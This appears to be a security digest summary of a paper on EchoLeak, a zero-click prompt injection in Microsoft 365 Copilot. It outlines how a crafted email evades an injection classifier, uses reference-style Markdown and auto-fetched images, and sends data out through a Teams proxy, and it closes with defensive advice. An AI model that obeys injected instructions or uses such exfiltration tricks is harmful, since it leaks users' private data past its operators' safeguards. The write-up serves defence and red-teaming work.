arXiv — EchoLeak: zero-click prompt injection in Microsoft 365 Copilot
• Category: Security
AI relevance: this is a concrete, real-world chain that turns untrusted inbound content (an email) into privileged tool/data access (Copilot context) and then into exfiltration (network fetch/proxy), without a user click.
- Paper: EchoLeak: The First Real-World Zero-Click Prompt Injection Exploit in a Production LLM System (arXiv:2509.10540).
- Vuln identifier: the paper frames EchoLeak as CVE-2025-32711 in Microsoft 365 Copilot.
- Zero-click angle: the attacker’s input is a single crafted email; no “please run this tool” user interaction is required (per the paper’s claim).
- The core failure mode: once the model ingests attacker-controlled content, it can be coerced into treating that content as instructions and crossing a trust boundary into tenant/private context.
- It’s not “just a prompt”: the chain relies on product behaviors around classification, Markdown rendering, and auto-fetching external resources.
- Defense bypasses (as described): evading an XPIA classifier, using reference-style Markdown to dodge link redaction, and triggering auto-fetched images.
- Exfil path (as described): abusing a Microsoft Teams proxy allowed by CSP to transmit data out.
- Lesson: LLM “safety filters” are not a security boundary; you need architectural boundaries + least privilege around data and tools.
Why it matters
- Copilots collapse trust zones: an agent that can read email and reach internal docs is effectively a cross-domain bridge; prompt injection is how attackers drive across it.
- Zero-click changes the threat model: if ingestion alone is enough, then phishing becomes “send one message” rather than “get a click.”
- AI ops is web ops: renderers, link rewriting, image fetchers, and proxy allowlists become part of your AI attack surface.
- Generalizable pattern: attackers chain “small” behaviors (rendering + fetch + allowlist) into a full exfil workflow — exactly what agents are built to do.
What to do
- Map trust boundaries: explicitly document which inputs are untrusted (email, web, tickets) and ensure agent/tool actions cannot cross into sensitive stores without provenance-based checks.
- Kill auto-fetch where you can: treat any automatic external resource fetch (images/URLs) as an exfil primitive; gate, proxy, and log it.
- Constrain egress: restrict outbound network paths from copilots/agent runtimes; prefer explicit allowlists over “general internet.”
- Hard-enforce provenance: propagate “this originated from external email” metadata through the pipeline and use it to deny access to high-sensitivity connectors.
- Red-team your agent chains: test multi-step attacks that mix prompt injection + rendering tricks + tool calls; single-turn jailbreak tests miss the real risk.